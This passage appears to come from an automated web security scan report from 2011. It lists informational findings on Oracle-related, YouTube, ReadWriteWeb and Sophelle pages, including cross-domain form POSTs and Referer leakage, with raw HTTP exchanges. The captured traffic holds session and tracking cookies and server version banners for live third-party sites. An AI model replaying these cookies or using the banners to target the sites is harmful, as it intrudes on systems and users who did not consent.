<P>Simon Gook, MD said, ...<EM>I am delighted to have Harbottle & Lewis representing TrimSole... The next few years will see TrimSole.. expand into overseas markets and we are looking forward to a very exciting period of further growth for the brand</EM>....<BR></P></p>
 </div>
<div class="side-column">
<div class="highlights box">
<h2>Site Highlights</h2>
<ul>

<li><h3><a href="pages/articles/direct_beauty_products_trimsole.php"><span>05 Aug 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Direct Beauty Products on TrimSole.. Footwear</p></li>
<li><h3><a href="pages/articles/redkite_financial_markets_investment_dfj_esprit.php"><span>29 Jul 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Redkite Financial Markets on Investment From DFJ Esprit</p></li>




<li><h3><a href="pages/article_view_hnl/9733.php"><span>19 May 11</span></a>
<strong>Article</strong></h3>
<p>Interflora v Marks & Spencer - the Impact on IP, Competitiveness and Advertising</p></li>

</ul> </div>


</div>
</div>
</div>
<div style="clear: both"></div>
</div>
<div id=
...[SNIP]...

17.9. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oraclecfo.com
Path:	/Main/Solutions/Solutions_w.html

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:12:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPaA8FDzhjZTNhY2Y0N2U1NTJmYhgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQU3Y3RsMDAkY3BoUGxhY2Vob2xkZXIkU29sdXRpb25zX3cxJHJhZE11bHRpUGFnZVNvbHV0aW9ucwUhY3RsMDAkdWNOYXZpZ2F0aW9uQmFyJHJjYkxhbmd1YWdlBTZjdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkcmFkVGFiU3RyaXBTb2x1dGlvbnMFRmN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRTb2x1dGlvbnNfdXNlckNvbnRyb2wkcmFkVHJlZUFydGljbGUFQ2N0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd01hbmFnZXIFRGN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd0NvbW1lbnRzBUljdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkY3RyQXJ0aWNsZURldGFpbCRyYWRXaW5kb3dFbWFpbFRvRnJpZW5kBSFjdGwwMCRCb3R0b21CYXIxJHJhZFdpbmRvd01hbmFnZXIFI2N0bDAwJEJvdHRvbUJhcjEkcmFkV2luZG93Q29udGFjdFVzBSFjdGwwMCR1Y05hdmlnYXRpb25CYXIkcmNiTGFuZ3VhZ2UPFCsAAgUMRW5nbGlzaCAoVVMpBQI0NmRD+cXT9B8yFvf0On39nUNLNSWkcA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['CFOForm'];
if (!theForm) {
theForm = document.CFOForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>

<script src="/WebResource.axd?d=xxLpubPyMH8WlPL1KC1Cl97yCQ5agbMCK77u8WUxAL2WNEamF9RLfFzaYd6uAcV29_OFRlkJ_GhzXXxwCoqyz1QhmyY1&t=634231599793442370" type="text/javascript"></script>

<script src="/ScriptResource.axd?d=nXQOPGhqmFIRc_W4VpICinL5LLDlZmU6yKRvsQB0r-g0fb6jWj2rK3yZgL357FWfSS7NPZAOXLpSDEEIO1QdAsYt5hv0lktFq7-Ltz5-vCfVFL4uVv9H96tDckKtg2miRROMBUptJkt5bRzGjhOV_K6Qg_A1&t=ffffffffce95b69e" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=4_4jN_OMeI22vqWZkAs5U7htoHKf-_-9LA1mFpO-TPweLk-2Y7iAJMxCXuieNf4DNmc9Y8x0ZtSbUHHUIYyYvvDFLwguf4ZnmH3uSnmNEVMlfXBZFG31wQ4e76Y0z-m1YxANU6Uc_HmF7FjaruRAB4pVFKFyLeVF6MMq0GlM_bm6R8cj0&t=ffffffffce95b69e" type="text/javascript"></script>
<script
...[SNIP]...

Request 2

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:15:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPaA8FDzhjZTNhY2ZjN2FiYTRjORgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQU3Y3RsMDAkY3BoUGxhY2Vob2xkZXIkU29sdXRpb25zX3cxJHJhZE11bHRpUGFnZVNvbHV0aW9ucwUhY3RsMDAkdWNOYXZpZ2F0aW9uQmFyJHJjYkxhbmd1YWdlBTZjdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkcmFkVGFiU3RyaXBTb2x1dGlvbnMFRmN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRTb2x1dGlvbnNfdXNlckNvbnRyb2wkcmFkVHJlZUFydGljbGUFQ2N0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd01hbmFnZXIFRGN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd0NvbW1lbnRzBUljdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkY3RyQXJ0aWNsZURldGFpbCRyYWRXaW5kb3dFbWFpbFRvRnJpZW5kBSFjdGwwMCRCb3R0b21CYXIxJHJhZFdpbmRvd01hbmFnZXIFI2N0bDAwJEJvdHRvbUJhcjEkcmFkV2luZG93Q29udGFjdFVzBSFjdGwwMCR1Y05hdmlnYXRpb25CYXIkcmNiTGFuZ3VhZ2UPFCsAAgUMRW5nbGlzaCAoVVMpBQI0NmRThAXiW74fMhlUkw6cdhbCtclo8A==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['CFOForm'];
if (!theForm) {
theForm = document.CFOForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>

<script src="/WebResource.axd?d=xxLpubPyMH8WlPL1KC1Cl97yCQ5agbMCK77u8WUxAL2WNEamF9RLfFzaYd6uAcV29_OFRlkJ_GhzXXxwCoqyz1QhmyY1&t=634231599793442370" type="text/javascript"></script>

<script src="/ScriptResource.axd?d=nXQOPGhqmFIRc_W4VpICinL5LLDlZmU6yKRvsQB0r-g0fb6jWj2rK3yZgL357FWfSS7NPZAOXLpSDEEIO1QdAsYt5hv0lktFq7-Ltz5-vCfVFL4uVv9H96tDckKtg2miRROMBUptJkt5bRzGjhOV_K6Qg_A1&t=ffffffffce95b69e" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=4_4jN_OMeI22vqWZkAs5U7htoHKf-_-9LA1mFpO-TPweLk-2Y7iAJMxCXuieNf4DNmc9Y8x0ZtSbUHHUIYyYvvDFLwguf4ZnmH3uSnmNEVMlfXBZFG31wQ4e76Y0z-m1YxANU6Uc_HmF7FjaruRAB4pVFKFyLeVF6MMq0GlM_bm6R8cj0&t=ffffffffce95b69e" type="text/javascript"></script>
<script
...[SNIP]...

17.10. http://www.youtube.com/v/JWMKXb1Guq4 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/JWMKXb1Guq4

Request 1

GET /v/JWMKXb1Guq4?version=3&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:58 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3187
Content-Type: application/x-shockwave-flash

CWS
x...x..W.{.F...@6.>..,Yr(...E"..-.VL.5T$QK...]    ..1.0.H.....e....o........9.m.{b.o'.^.4.E.. E..8..'..z.............'@.......r..    .#..m.w...5.t6q.x.....T..."y.........F*..Z^^D.E.e.......my.;.).z..-3.....p...uP+.k.z.6<.J9..Vc.....K.T)oj.]S.-.^7....R..N.*..P.lQ3T..(...:...l+S..Xb.`...D...I."\..3t.o.*.N..Z.n[.F.m...S.W......;Ufo5.W.u.O..r...T..)..q......m..{...g......'......%.
N|.z...
.o.>..K....0..kg.Ra.......e.`ci5.....^][Y........P..(..1...XB.`..!..(...B75. ....kU.
.%fqf.0@.sQ..k-.....Q.!../..$[.^;.d.z...../...._..._T..6.7.y..uG..:.(.....,.=\y..../...W..D.L.LC7Y..^g...oF..o....<...`-..3..+.*...>#.5.`0.....V..
.iyi..O....K.9?iE...U..k/.ku.O....u...r.Ylj..'/Z..$....C.W..+.....u...P.f9..\c.9....V...m...l..<PG.uCma.....<w.[.~M..q.....v.....T~........Bp....c.<).O..+..N.|.j.N... ..7........L5...k..:....`Xje...P..|...Z.m.Y.7.....e.j....~...3.3.}..u....8..]f.8.n.#k.[S..sH....}...3.L.C....4Ln.7...f5Y.
.Qf{&T@wN....)p..s}wzOg....<....v.....Z.f;.L.p.gh.O.".n..t.    .B..'.U.3T..W..05<.;..C..2...................1...?...3.@d.|.gE<<d..x.K......?..@9.L. .0..>S.*.aD.A..    z..1*.Cn..x:a...8Q..;...:..3.. ....@E$.....!.9.o..J=....[...$.....\....Ir~<.[.P...a... ....k..7(#=0t.h.......}~.=........W!....t..y+.\.[..;.../..y";..^..a2;...../.i
...'..o..    ...zs.i>-....W.._3..|7v.(..."._.g.........\.. ..s....{
..p.s-.......h.....n...).b...f..'..S..}+...}?,...3...$......BA"~...x.o.......|G.2...Q&{.nUw.G.w.z..o...~.>.,x...qX.[..}:.Z..j0u.....[w[....J`..`Qmg./.#..v~.p.......p....O...e.......q..}.].p..    t..?.......m...`....K....W".9.dM~..v.K..m..>.......f.....e0...ZW7.....2...:X.....l[x._.w...oo.co..^.ko.....?...:z...]y......[x.t..o..x.2..Q......e.&fM........A.......2.......B...v.=...Y.9J)....n.....B...../.....our..8d>..5...>c....l.r..sU.j..N....3...r:..:k...g.7......M.....}....'N..wn
y...9.d.....L.....\.W.2V.A_F21[.'*&.#b....Xi.R.T..:....,..X+.T............=.>....(...J......y...5|$..m.9.+.....p..=^....<.}../.q....).Hfg...9<|...X.}.l7.9...7..<.....,f$.2Zc..eY..4..<'E...;.u..a9.E+..y3J<.2/...Q.... ..t'm
...[SNIP]...

Request 2

GET /v/JWMKXb1Guq4?version=3&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:20 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3172
Content-Type: application/x-shockwave-flash

CWS
2...x..W.{............H.2(..M....HK. ...$.@...2...!F...3...>...9....=d...O.ao9.    ......)...z. @)...#g.........K... .;.....    .......vU..o.&....l...l.u......E.b9i.......Tz)......N.t.....7...l3.b.W.....e..>....V+....mx..J....L.I-&...Z..,....j.a.........U9.P...f.N.q.'.u\.5.f.j.Yb.`...D...I."\..3t.o.*.NV.z.a[.f.m...S.W...f.....7...i].S..\.b3..nJti.o..iS=e.;G..z....l.......Rzq.......pv.....O....b....z.U..
.Wc...l..........WV...1....uQ..U...........iQ....nj.@.'.M...U.K.8%...j.....}w<./'[.^?..|..._.~......b%U...4.i....S...8..E.b5M.`i...#$..xA.(...&2f"g......)[H.jVC.Z..V.F.!.....0..$7z.cW.U.qY}F.>2.y.....Xf.}.....g.Z......."_...V........rS.*.f..p..5......|..O_.....p..s..^>zXh.Vv...l.Qn.......W;.[~.l.y..C....0#.b...;..s.!..8..BW;vl.np.?..N.....!8....1|....j....IVN[..1|...d...s..:...a.U.pC...j0...    ..V...........7....y.q...P...V.[..e.......Q.::.;O.]..6q...G....V.....\.T....V...G.k[-h...o>.}.:g=+.G...P..9..r....C....=.......nV.eN./.h....0Y.i.....E..R)...2..s.m..k......ajx.......d.#}.I. ....04.+    $..#..q ~.'
.......xB......._..-.|E.rD.>E.a..}..U.......#.8.#.T....    .t..'.q..3v.._u,.f .A.L]...H:...Crs....z..N.7}.)H.'.... ...&...\o.C..>.5.v.....oP..................m.h.O&.c&._.@..c.....<r%ou.............{.:....?......)t4..`P...&..v..i....3.._..........X.K..~).-.~..S>..p.F....E.c&.)...{.k.=...%.C...?Dw;..N1..w\vo.yR.?.....}...."x 8...J.,....+.$.'..O..........w.<S.*.f.G..t.{4z........g.c..g....U.Ua..C.....SW
.)...u...!....-......,>.-n.+....g.p>.7~V..*.Z....-...eV......O.....h.....m...a.........^.x.p....5.._..m[...,xg...4+..>.,..f..j......\..m...r..F..`........&}{..{.}..]{.>DUw...,4.Sl....].....K.{.x.8......Zf.w.E,.71k.n.....LC.Z&'X...>..F....>P...9p..j.QJA../p.M.F.......}yx.m.x.....!s.....5r.=.{Z.-....U.fUg:.B.....SK..Z...,.Fo.{.w....m..+.f....'e.{7..k[..9g...w.L.....\.W.
..A_F21[..*&.#b....Xi...T..:....,.g..8W.&..........=.>..U.Q.,.L.....Ux...5|$..m.9.+.....p..=^....Y>..g.D...6..t"....V...Yf.Sy.....Q. ./.d..Y. ..hb1#...:s.,..7.!,.9).u.....V..i.,Z....Q...y.U..*.......;i;.V......}.
...[SNIP]...

18. Cross-domain POST previous next
There are 5 instances of this issue:

http://education.oracle.com/education/netcall/talk_to_us_ca.html
http://education.oracle.com/education/netcall/talk_to_us_us.html
http://www.readwriteweb.com/enterprise/2010/11/oracle.php
http://www.sophelle.com/Contact-Us/
http://www.sophelle.com/Products/CQ/free-trial.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

18.1. http://education.oracle.com/education/netcall/talk_to_us_ca.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/netcall/talk_to_us_ca.html

Issue detail

The page contains a form which POSTs data to the domain my.hyperphonelink.com. The form contains the following fields:

udo_referer
responseurl
errorurl
email
memberid
buttontype
udo_agentannounce
udo_name
telno

Request

GET /education/netcall/talk_to_us_ca.html HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ETag: "7ad9ad-840-4dcb6cc7"
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 12 May 2011 05:14:47 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=0;ecid=72057850008802081,0)
Content-Length: 2112
Date: Tue, 06 Sep 2011 15:59:32 GMT
Accept-Ranges: bytes

<html>
<head>
<title>Place a Call</title>
<script language="Javascript" src="http://education.oracle.com/education/jscripts/ou_lib.js"></script>
<script language="Javascript" src="/education/netcall/n
...[SNIP]...
<br>
<form name="personalInfo" method="post" action="http://my.hyperphonelink.com/hpl/hyperphone.asp" >
<input type="hidden" name="udo_referer" value="">
...[SNIP]...

18.2. http://education.oracle.com/education/netcall/talk_to_us_us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/netcall/talk_to_us_us.html

Issue detail

The page contains a form which POSTs data to the domain my.hyperphonelink.com. The form contains the following fields:

udo_referer
responseurl
errorurl
email
memberid
buttontype
udo_agentannounce
udo_name
telno

Request

GET /education/netcall/talk_to_us_us.html HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ETag: "7ad9ac-848-4dcb6cc7"
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 12 May 2011 05:14:47 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=0;ecid=72057862893703826,0)
Content-Length: 2120
Date: Sat, 03 Sep 2011 12:44:58 GMT
Accept-Ranges: bytes

<html>
<head>
<title>Place a Call</title>
<script language="Javascript" src="http://education.oracle.com/education/jscripts/ou_lib.js"></script>
<script language="Javascript" src="/education/netcall/n
...[SNIP]...
<br>
<form name="personalInfo" method="post" action="http://my.hyperphonelink.com/hpl/hyperphone.asp" >
<input type="hidden" name="udo_referer" value="">
...[SNIP]...

18.3. http://www.readwriteweb.com/enterprise/2010/11/oracle.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readwriteweb.com
Path:	/enterprise/2010/11/oracle.php

Issue detail

The page contains a form which POSTs data to the domain readwriteweb.us2.list-manage.com. The form contains the following fields:

MERGE0

Request

GET /enterprise/2010/11/oracle.php HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.4. http://www.sophelle.com/Contact-Us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/

Issue detail

The page contains a form which POSTs data to the domain sophelle.web5.hubspot.com. The form contains the following fields:

FormSubmitRedirectURL
Lead_Src
LeadGen_ContactForm_14884_m0submitter_user_token
ContactFormId
LeadGen_ContactForm_14884_m0spam_check_key
LeadGen_ContactForm_14884_m0spam_check_sig
LeadGen_ContactForm_14884_m0:FirstName
LeadGen_ContactForm_14884_m0:LastName
LeadGen_ContactForm_14884_m0:Company
LeadGen_ContactForm_14884_m0:JobTitle
LeadGen_ContactForm_14884_m0:Email
LeadGen_ContactForm_14884_m0:Phone
LeadGen_ContactForm_Submit_LeadGen_ContactForm_14884_m0

Request

GET /Contact-Us/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.1.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A27%3A50; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</p>

<form action="http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.sophelle.com/Contact-Us/thank-you.html" >
...[SNIP]...

18.5. http://www.sophelle.com/Products/CQ/free-trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/CQ/free-trial.html

Issue detail

The page contains a form which POSTs data to the domain sophelle.web5.hubspot.com. The form contains the following fields:

FormSubmitRedirectURL
Lead_Src
LeadGen_ContactForm_26423_m0submitter_user_token
ContactFormId
LeadGen_ContactForm_26423_m0spam_check_key
LeadGen_ContactForm_26423_m0spam_check_sig
LeadGen_ContactForm_26423_m0:FirstName
LeadGen_ContactForm_26423_m0:LastName
LeadGen_ContactForm_26423_m0:Email
LeadGen_ContactForm_26423_m0:Phone
LeadGen_ContactForm_26423_m0:Company
LeadGen_ContactForm_26423_m0:WebSite
LeadGen_ContactForm_Submit_LeadGen_ContactForm_26423_m0

Request

GET /Products/CQ/free-trial.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A05; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.5.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 11346
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "88c5d554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Trial Offer |
...[SNIP]...
</h2> -->
<form action="http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26423" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.sophelle.com/products/cq/thank-you-trial.html" >
...[SNIP]...

19. Cross-domain Referer leakage previous next
There are 119 instances of this issue:

http://a.tribalfusion.com/j.ad
http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js
https://account.bigcommerce.com/cart.php
http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38
http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus
http://ad.doubleclick.net/adj/nbcu.cnbc/search
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
http://ads.adsonar.com/adserving/getAds.jsp
